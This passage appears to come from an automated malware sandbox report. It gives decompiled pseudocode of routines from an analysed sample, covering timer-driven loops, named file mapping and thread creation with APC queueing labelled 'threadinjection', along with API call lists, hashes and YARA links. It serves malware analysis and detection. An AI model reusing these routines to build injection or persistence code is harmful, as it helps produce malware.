						RtlFreeHeap( *0xa3d270, 0, _t100); // executed
					}
					HeapFree( *0xa3d270, 0, _a24);
				}
				RtlFreeHeap( *0xa3d270, 0, _t105); // executed
				return _a4;
			}


















































                                                                                                                                  0x00a344a4
                                                                                                                                  0x00a344a4
                                                                                                                                  0x00a344a4
                                                                                                                                  0x00a344a9
                                                                                                                                  0x00a344af
                                                                                                                                  0x00a344b9
                                                                                                                                  0x00a344bb
                                                                                                                                  0x00a344bb
                                                                                                                                  0x00a344c8
                                                                                                                                  0x00a344d3
                                                                                                                                  0x00a344d6
                                                                                                                                  0x00a344e1
                                                                                                                                  0x00a344e4
                                                                                                                                  0x00a344e9
                                                                                                                                  0x00a344ec
                                                                                                                                  0x00a344f1
                                                                                                                                  0x00a344f4
                                                                                                                                  0x00a34500
                                                                                                                                  0x00a3450d
                                                                                                                                  0x00a3450f
                                                                                                                                  0x00a34515
                                                                                                                                  0x00a3451a
                                                                                                                                  0x00a34525
                                                                                                                                  0x00a34527
                                                                                                                                  0x00a3452a
                                                                                                                                  0x00a3452c
                                                                                                                                  0x00a34531
                                                                                                                                  0x00a34535
                                                                                                                                  0x00a34537
                                                                                                                                  0x00a3453c
                                                                                                                                  0x00a34548
                                                                                                                                  0x00a3454a
                                                                                                                                  0x00a34556
                                                                                                                                  0x00a34558
                                                                                                                                  0x00a34558
                                                                                                                                  0x00a34563
                                                                                                                                  0x00a34567
                                                                                                                                  0x00a34569
                                                                                                                                  0x00a3456e
                                                                                                                                  0x00a3457a
                                                                                                                                  0x00a3457c
                                                                                                                                  0x00a34588
                                                                                                                                  0x00a3458a
                                                                                                                                  0x00a3458a
                                                                                                                                  0x00a34590
                                                                                                                                  0x00a345a3
                                                                                                                                  0x00a345a7
                                                                                                                                  0x00a345ae
                                                                                                                                  0x00a345b1
                                                                                                                                  0x00a345b6
                                                                                                                                  0x00a345c1
                                                                                                                                  0x00a345c3
                                                                                                                                  0x00a345c6
                                                                                                                                  0x00a345c6
                                                                                                                                  0x00a345c8
                                                                                                                                  0x00a345cf
                                                                                                                                  0x00a345d2
                                                                                                                                  0x00a345d7
                                                                                                                                  0x00a345e1
                                                                                                                                  0x00a345e3
                                                                                                                                  0x00a345eb
                                                                                                                                  0x00a345fe
                                                                                                                                  0x00a34604
                                                                                                                                  0x00a34608
                                                                                                                                  0x00a34614
                                                                                                                                  0x00a34619
                                                                                                                                  0x00a34622
                                                                                                                                  0x00a34633
                                                                                                                                  0x00a34637
                                                                                                                                  0x00a34640
                                                                                                                                  0x00a34646
                                                                                                                                  0x00a34653
                                                                                                                                  0x00a34660
                                                                                                                                  0x00a34666
                                                                                                                                  0x00a34672
                                                                                                                                  0x00a34678
                                                                                                                                  0x00a34679
                                                                                                                                  0x00a3467e
                                                                                                                                  0x00a34684
                                                                                                                                  0x00a3468a
                                                                                                                                  0x00a34691
                                                                                                                                  0x00a34698
                                                                                                                                  0x00a3469e
                                                                                                                                  0x00a346a5
                                                                                                                                  0x00a346a9
                                                                                                                                  0x00a346b4
                                                                                                                                  0x00a346b9
                                                                                                                                  0x00a346bf
                                                                                                                                  0x00a346c8
                                                                                                                                  0x00a346c8
                                                                                                                                  0x00a346d9
                                                                                                                                  0x00a346d9
                                                                                                                                  0x00a346e8
                                                                                                                                  0x00a346e8
                                                                                                                                  0x00a346f7
                                                                                                                                  0x00a346f7
                                                                                                                                  0x00a34709
                                                                                                                                  0x00a34709
                                                                                                                                  0x00a34718
                                                                                                                                  0x00a34729

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A344BB
                                                                                                                                  • wsprintfA.USER32 ref: 00A34508
                                                                                                                                  • wsprintfA.USER32 ref: 00A34525
                                                                                                                                  • wsprintfA.USER32 ref: 00A34548
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A34558
                                                                                                                                  • wsprintfA.USER32 ref: 00A3457A
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A3458A
                                                                                                                                  • wsprintfA.USER32 ref: 00A345C1
                                                                                                                                  • wsprintfA.USER32 ref: 00A345E1
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00A345FE
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00A3460E
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(033A9570), ref: 00A34622
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(033A9570), ref: 00A34640
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,00A34653,?,033A95B0), ref: 00A3199F
                                                                                                                                    • Part of subcall function 00A31974: lstrlen.KERNEL32(?,?,?,00A34653,?,033A95B0), ref: 00A319A7
                                                                                                                                    • Part of subcall function 00A31974: strcpy.NTDLL ref: 00A319BE
                                                                                                                                    • Part of subcall function 00A31974: lstrcat.KERNEL32(00000000,?), ref: 00A319C9
                                                                                                                                    • Part of subcall function 00A31974: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A34653,?,033A95B0), ref: 00A319E6
                                                                                                                                  • StrTrimA.SHLWAPI(00000000,00A3C2AC,?,033A95B0), ref: 00A34672
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(033A9B10,00000000,00000000,7691C740,00A3467E,00000000), ref: 00A338DA
                                                                                                                                    • Part of subcall function 00A338CA: lstrlen.KERNEL32(?), ref: 00A338E2
                                                                                                                                    • Part of subcall function 00A338CA: lstrcpy.KERNEL32(00000000,033A9B10), ref: 00A338F6
                                                                                                                                    • Part of subcall function 00A338CA: lstrcat.KERNEL32(00000000,?), ref: 00A33901
                                                                                                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00A34691
                                                                                                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00A34698
                                                                                                                                  • lstrcat.KERNEL32(00000000,?), ref: 00A346A5
                                                                                                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A346A9
                                                                                                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00A346D9
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A346E8
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,033A95B0), ref: 00A346F7
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A34709
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?), ref: 00A34718
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3963266935-8415677
                                                                                                                                  • Opcode ID: af24eea4083ade2fc179135c9e50b423b2eaddbb591301222084f31320140a73
                                                                                                                                  • Instruction ID: ff65ec6cb014dbd931d93bea42b486d0ff242564e77c1cbb022d482e94471505
                                                                                                                                  • Opcode Fuzzy Hash: af24eea4083ade2fc179135c9e50b423b2eaddbb591301222084f31320140a73
                                                                                                                                  • Instruction Fuzzy Hash: 71619B71900200EFD721EBE8ED89F977BA8FB49750F040418F949D7261DB35E9178B65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A35461, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 150timememoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E00A35461(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xa3d278);
					_v20 = 0;
					_v16 = 0;
					L00A3AED0();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xa3d2a4; // 0x208
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xa3d284 = 5;
						} else {
							_t68 = E00A3502E(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xa3d298 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00A3577D(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00A32107(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xa3d27c);
							goto L21;
						} else {
							__eflags =  *0xa3d280; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00A347D5();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xa3d280);
								L21:
								L00A3AED0();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xa3d270, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                                  0x00a35461
                                                                                                                                  0x00a35473
                                                                                                                                  0x00a35476
                                                                                                                                  0x00a35482
                                                                                                                                  0x00a35488
                                                                                                                                  0x00a3548d
                                                                                                                                  0x00a355f4
                                                                                                                                  0x00a35493
                                                                                                                                  0x00a35493
                                                                                                                                  0x00a35495
                                                                                                                                  0x00a3549a
                                                                                                                                  0x00a3549b
                                                                                                                                  0x00a354a1
                                                                                                                                  0x00a354a4
                                                                                                                                  0x00a354a7
                                                                                                                                  0x00a354b5
                                                                                                                                  0x00a354c0
                                                                                                                                  0x00a354c3
                                                                                                                                  0x00a354c5
                                                                                                                                  0x00a354d2
                                                                                                                                  0x00a354dc
                                                                                                                                  0x00a354de
                                                                                                                                  0x00a354e3
                                                                                                                                  0x00a354e8
                                                                                                                                  0x00a354f3
                                                                                                                                  0x00a354f3
                                                                                                                                  0x00a354ea
                                                                                                                                  0x00a354ea
                                                                                                                                  0x00a354f1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a354f1
                                                                                                                                  0x00a354fd
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35500
                                                                                                                                  0x00a35504
                                                                                                                                  0x00a3550f
                                                                                                                                  0x00a3550f
                                                                                                                                  0x00a35516
                                                                                                                                  0x00a3551f
                                                                                                                                  0x00a35526
                                                                                                                                  0x00a3552f
                                                                                                                                  0x00a35532
                                                                                                                                  0x00a35535
                                                                                                                                  0x00a3553a
                                                                                                                                  0x00a3553f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35541
                                                                                                                                  0x00a35544
                                                                                                                                  0x00a35547
                                                                                                                                  0x00a3554a
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3554c
                                                                                                                                  0x00a3555b
                                                                                                                                  0x00a3555b
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35589
                                                                                                                                  0x00a35589
                                                                                                                                  0x00a3558e
                                                                                                                                  0x00a355ad
                                                                                                                                  0x00a355af
                                                                                                                                  0x00a355b4
                                                                                                                                  0x00a355b5
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35590
                                                                                                                                  0x00a35590
                                                                                                                                  0x00a35596
                                                                                                                                  0x00000000
                                                                                                                                  0x00a35598
                                                                                                                                  0x00a35598
                                                                                                                                  0x00a3559d
                                                                                                                                  0x00a3559f
                                                                                                                                  0x00a355a4
                                                                                                                                  0x00a355a5
                                                                                                                                  0x00a355bb
                                                                                                                                  0x00a355bb
                                                                                                                                  0x00a355c3
                                                                                                                                  0x00a355ce
                                                                                                                                  0x00a355d1
                                                                                                                                  0x00a355dc
                                                                                                                                  0x00a355de
                                                                                                                                  0x00a355e1
                                                                                                                                  0x00a355e3
                                                                                                                                  0x00000000
                                                                                                                                  0x00a355e9
                                                                                                                                  0x00000000
                                                                                                                                  0x00a355e9
                                                                                                                                  0x00a355e3
                                                                                                                                  0x00a35596
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3558e
                                                                                                                                  0x00a3555e
                                                                                                                                  0x00a35560
                                                                                                                                  0x00a35563
                                                                                                                                  0x00a35564
                                                                                                                                  0x00a35564
                                                                                                                                  0x00a35568
                                                                                                                                  0x00a35572
                                                                                                                                  0x00a35572
                                                                                                                                  0x00a35578
                                                                                                                                  0x00a3557b
                                                                                                                                  0x00a3557b
                                                                                                                                  0x00a35581
                                                                                                                                  0x00a35581
                                                                                                                                  0x00a355fe
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • memset.NTDLL ref: 00A35476
                                                                                                                                  • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00A35482
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00A354A7
                                                                                                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00A354C3
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A354DC
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00A35572
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00A35581
                                                                                                                                  • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00A355BB
                                                                                                                                  • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00A353C9,?), ref: 00A355D1
                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A355DC
                                                                                                                                    • Part of subcall function 00A3502E: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033A9370,00000000,?,74E5F710,00000000,74E5F730), ref: 00A3507D
                                                                                                                                    • Part of subcall function 00A3502E: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033A93A8,?,00000000,30314549,00000014,004F0053,033A9364), ref: 00A3511A
                                                                                                                                    • Part of subcall function 00A3502E: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00A354EF), ref: 00A3512C
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A355EE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                  • String ID: Ut$@MtNt
                                                                                                                                  • API String ID: 3521023985-969920318
                                                                                                                                  • Opcode ID: 228e3dc9faf01126e674017af04cc8d5a12c4737ec722fe71fac231c8a18c7c9
                                                                                                                                  • Instruction ID: aadce857f530ab2c8e9ec5acda1d61b491719f0364b6acf763bda2fe745e5f7f
                                                                                                                                  • Opcode Fuzzy Hash: 228e3dc9faf01126e674017af04cc8d5a12c4737ec722fe71fac231c8a18c7c9
                                                                                                                                  • Instruction Fuzzy Hash: 185127B1C01228EBDF11DFE9DD449EEBFB9EF09720F204616F415A6190D7709A45DBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00A33598, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E00A33598(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00A3AECA();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xa3d2e0; // 0x296a5a8
				_t5 = _t13 + 0xa3e876; // 0x33a8e1e
				_t6 = _t13 + 0xa3e59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00A3ABEA();
				_t17 = CreateFileMappingW(0xffffffff, 0xa3d2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                                                                                                                  0x00a33598
                                                                                                                                  0x00a335a0
                                                                                                                                  0x00a335a4
                                                                                                                                  0x00a335aa
                                                                                                                                  0x00a335af
                                                                                                                                  0x00a335b4
                                                                                                                                  0x00a335b7
                                                                                                                                  0x00a335ba
                                                                                                                                  0x00a335bf
                                                                                                                                  0x00a335c0
                                                                                                                                  0x00a335c3
                                                                                                                                  0x00a335c8
                                                                                                                                  0x00a335cf
                                                                                                                                  0x00a335d9
                                                                                                                                  0x00a335db
                                                                                                                                  0x00a335dc
                                                                                                                                  0x00a335df
                                                                                                                                  0x00a335fb
                                                                                                                                  0x00a33601
                                                                                                                                  0x00a33605
                                                                                                                                  0x00a33653
                                                                                                                                  0x00a33607
                                                                                                                                  0x00a33614
                                                                                                                                  0x00a33624
                                                                                                                                  0x00a3362c
                                                                                                                                  0x00a3363e
                                                                                                                                  0x00a33642
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3362e
                                                                                                                                  0x00a33631
                                                                                                                                  0x00a33636
                                                                                                                                  0x00a33638
                                                                                                                                  0x00a33638
                                                                                                                                  0x00a33616
                                                                                                                                  0x00a33618
                                                                                                                                  0x00a33644
                                                                                                                                  0x00a33645
                                                                                                                                  0x00a33645
                                                                                                                                  0x00a33614
                                                                                                                                  0x00a3365a

                                                                                                                                  APIs
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00A3529C,?,?,4D283A53,?,?), ref: 00A335A4
                                                                                                                                  • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00A335BA
                                                                                                                                  • _snwprintf.NTDLL ref: 00A335DF
                                                                                                                                  • CreateFileMappingW.KERNELBASE(000000FF,00A3D2E4,00000004,00000000,00001000,?), ref: 00A335FB
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A3529C,?,?,4D283A53), ref: 00A3360D
                                                                                                                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00A33624
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00A3529C,?,?), ref: 00A33645
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00A3529C,?,?,4D283A53), ref: 00A3364D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1814172918-3251738875
                                                                                                                                  • Opcode ID: dd110f7a63ddc4e3c9b82050a2e4f115e51733b590ab18309b6bb2fe09c841a6
                                                                                                                                  • Instruction ID: 9c49a4481e95523e49b941a20a2afcfbba01861e650ab5c33b0008ed424081c3
                                                                                                                                  • Opcode Fuzzy Hash: dd110f7a63ddc4e3c9b82050a2e4f115e51733b590ab18309b6bb2fe09c841a6
                                                                                                                                  • Instruction Fuzzy Hash: 8721D273A04204FFDB11DBA4DC06F9E77B9AB55714F200025F606E72D0E770DA068B54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D1B59, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6e8d4188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6e8d418c;
						if( *0x6e8d418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6e8d4198;
								if( *0x6e8d4198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6e8d418c);
						}
						HeapDestroy( *0x6e8d4190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6e8d4188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x6e8d4190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6e8d41b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6E8D153C(E6E8D1719, E6E8D1C35(_a12, 1, 0x6e8d4198, _t41));
							 *0x6e8d418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                                                                                                                  0x6e8d1b5c
                                                                                                                                  0x6e8d1b68
                                                                                                                                  0x6e8d1b6a
                                                                                                                                  0x6e8d1b6d
                                                                                                                                  0x6e8d1be3
                                                                                                                                  0x6e8d1be9
                                                                                                                                  0x6e8d1beb
                                                                                                                                  0x6e8d1bed
                                                                                                                                  0x6e8d1bf3
                                                                                                                                  0x6e8d1bf5
                                                                                                                                  0x6e8d1bfa
                                                                                                                                  0x6e8d1bfd
                                                                                                                                  0x6e8d1c08
                                                                                                                                  0x6e8d1c0a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1c0c
                                                                                                                                  0x6e8d1c0f
                                                                                                                                  0x6e8d1c11
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1c11
                                                                                                                                  0x6e8d1c19
                                                                                                                                  0x6e8d1c19
                                                                                                                                  0x6e8d1c25
                                                                                                                                  0x6e8d1c25
                                                                                                                                  0x6e8d1b6f
                                                                                                                                  0x6e8d1b70
                                                                                                                                  0x6e8d1b90
                                                                                                                                  0x6e8d1b96
                                                                                                                                  0x6e8d1b9b
                                                                                                                                  0x6e8d1b9d
                                                                                                                                  0x6e8d1bd9
                                                                                                                                  0x6e8d1bd9
                                                                                                                                  0x6e8d1b9f
                                                                                                                                  0x6e8d1ba7
                                                                                                                                  0x6e8d1bae
                                                                                                                                  0x6e8d1bb8
                                                                                                                                  0x6e8d1bc4
                                                                                                                                  0x6e8d1bc9
                                                                                                                                  0x6e8d1bd0
                                                                                                                                  0x6e8d1bd5
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d1bd5
                                                                                                                                  0x6e8d1bd0
                                                                                                                                  0x6e8d1b9d
                                                                                                                                  0x6e8d1b70
                                                                                                                                  0x6e8d1c32

                                                                                                                                  APIs
                                                                                                                                  • InterlockedIncrement.KERNEL32(6E8D4188), ref: 6E8D1B7B
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6E8D1B90
                                                                                                                                    • Part of subcall function 6E8D153C: CreateThread.KERNELBASE ref: 6E8D1553
                                                                                                                                    • Part of subcall function 6E8D153C: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6E8D1568
                                                                                                                                    • Part of subcall function 6E8D153C: GetLastError.KERNEL32(00000000), ref: 6E8D1573
                                                                                                                                    • Part of subcall function 6E8D153C: TerminateThread.KERNEL32(00000000,00000000), ref: 6E8D157D
                                                                                                                                    • Part of subcall function 6E8D153C: CloseHandle.KERNEL32(00000000), ref: 6E8D1584
                                                                                                                                    • Part of subcall function 6E8D153C: SetLastError.KERNEL32(00000000), ref: 6E8D158D
                                                                                                                                  • InterlockedDecrement.KERNEL32(6E8D4188), ref: 6E8D1BE3
                                                                                                                                  • SleepEx.KERNEL32(00000064,00000001), ref: 6E8D1BFD
                                                                                                                                  • CloseHandle.KERNEL32 ref: 6E8D1C19
                                                                                                                                  • HeapDestroy.KERNEL32 ref: 6E8D1C25
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                                                                                                                  • String ID: Tt
                                                                                                                                  • API String ID: 2110400756-3291821022
                                                                                                                                  • Opcode ID: 5fb0c542884707889908de6789a33be5e67e0192fe5a934506ecc0107e80e5f9
                                                                                                                                  • Instruction ID: 792de2e1cfda39e0c6f1dd243efab3d200e867a82ec99c9be0c377c6d15696bb
                                                                                                                                  • Opcode Fuzzy Hash: 5fb0c542884707889908de6789a33be5e67e0192fe5a934506ecc0107e80e5f9
                                                                                                                                  • Instruction Fuzzy Hash: 04216071644A1ABFCF40AFE9CC88A497BBCEF963647104C25E51AD3280E7348D4DCB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8D153C, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32threadinjectionCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D153C(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6e8d41c0, 0, _a12); // executed
